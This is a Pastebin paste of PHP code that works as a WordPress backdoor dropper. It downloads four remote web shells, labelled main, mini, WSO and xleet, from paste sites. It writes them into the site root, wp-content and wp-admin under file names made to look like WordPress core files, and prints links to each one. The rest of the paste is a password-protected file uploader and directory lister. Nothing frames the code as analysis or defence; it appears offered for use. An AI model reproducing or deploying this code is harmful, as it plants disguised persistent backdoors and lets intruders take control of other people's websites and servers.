Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $server = $_SERVER['HTTP_HOST'];
- @ini_set('output_buffering', 0);
- @ini_set('display_errors', 0);
- set_time_limit(0);
- ini_set('memory_limit', '64M');
- header('Content-Type: text/html; charset=UTF-8');
- function http_get($url){
- $im = curl_init($url);
- curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($im, CURLOPT_HEADER, 0);
- return curl_exec($im);
- curl_close($im);
- }
- $check1 = $_SERVER['DOCUMENT_ROOT'] . "/wp-config-samsples.php" ;
- $text1 = http_get('https://pastebin.com/raw/WVUjGABA'); //main shell
- $open1 = fopen($check1, 'w');
- fwrite($open1, $text1);
- fclose($open1);
- if(file_exists($check1)){
- }
- echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-config-samsples.php\">".$_SERVER['HTTP_HOST']."/wp-config-samsples.php</a>\n<br>";
- $check2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/themes/class-wp-filesystemss.php" ;
- $text2 = http_get('http://3e593e21dae5bb3d.paste.se/raw'); //mini shell
- $open2 = fopen($check2, 'w');
- fwrite($open2, $text2);
- fclose($open2);
- if(file_exists($check2)){
- }
- echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-content/themes/class-wp-filesystemss.php\">".$_SERVER['HTTP_HOST']."/wp-content/themes/class-wp-filesystemss.php </a>\n<br>";
- $check3 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/user/class-wp-filesystem.php" ;
- $text3 = http_get('http://a0bfe5a1cc734e0f.paste.se/raw'); //wso shell
- $open3 = fopen($check3, 'w');
- fwrite($open3, $text3);
- fclose($open3);
- if(file_exists($check3)){
- }
- echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-admin/user/class-wp-filesystem.php\">".$_SERVER['HTTP_HOST']."/wp-admin/user/class-wp-filesystem.php </a>\n<br>";
- $check4 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css/class-wp.php" ;
- $text4 = http_get('http://c65f10a1973cf6d8.paste.se/raw'); //xleet shell
- $open4 = fopen($check4, 'w');
- fwrite($open4, $text4);
- fclose($open4);
- if(file_exists($check4)){
- }
- echo " Stored : <a href=\"http://".$_SERVER['HTTP_HOST']."/wp-admin/css/class-wp.php\">".$_SERVER['HTTP_HOST']."/wp-admin/css/class-wp.php </a>\n<br>";
- ?>
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
- <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256" /></head><body>
- <?php
- if (!empty($_GET['action']) && $_GET['action'] == "logout") {session_destroy();unset ($_SESSION['pass']);}
- $path_name = pathinfo($_SERVER['PHP_SELF']);
- $this_script = $path_name['basename'];
- if (empty($_SESSION['pass'])) {$_SESSION['pass']='';}
- if (empty($_POST['pass'])) {$_POST['pass']='';}
- if ( $_SESSION['pass']!== $pass)
- {
- if ($_POST['pass'] == $pass) {$_SESSION['pass'] = $pass; }
- else
- {
- echo '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><input name="pass" type="password"><input type="submit"></form>';
- exit;
- }
- }
- ?>
- <form enctype="multipart/form-data" action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
- File mu mas : <input name="file" type="file" /><br />
- <input type="submit" value="Upload" /></form>
- <?php
- if (!empty($_FILES["file"]))
- {
- if ($_FILES["file"]["error"] > 0)
- {echo "Error: " . $_FILES["file"]["error"] . "<br>";}
- else
- {echo "Stored file:".$_FILES["file"]["name"]."<br/>Size:".($_FILES["file"]["size"]/1024)." kB<br/>";
- move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
- }
- }
- // open this directory
- $myDirectory = opendir(".");
- // get each entry
- while($entryName = readdir($myDirectory)) {$dirArray[] = $entryName;} closedir($myDirectory);
- $indexCount = count($dirArray);
- echo "$indexCount files<br/>";
- sort($dirArray);
- echo "<TABLE border=1 cellpadding=5 cellspacing=0 class=whitelinks><TR><TH>Filename</TH><th>Filetype</th><th>Filesize</th></TR>\n";
- for($index=0; $index < $indexCount; $index++)
- {
- if (substr("$dirArray[$index]", 0, 1) != ".")
- {
- echo "<TR>
- <td><a href=\"$dirArray[$index]\">$dirArray[$index]</a></td>
- <td>".filetype($dirArray[$index])."</td>
- <td>".filesize($dirArray[$index])."</td>
- </TR>";
- }
- }
- echo "</TABLE>";
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement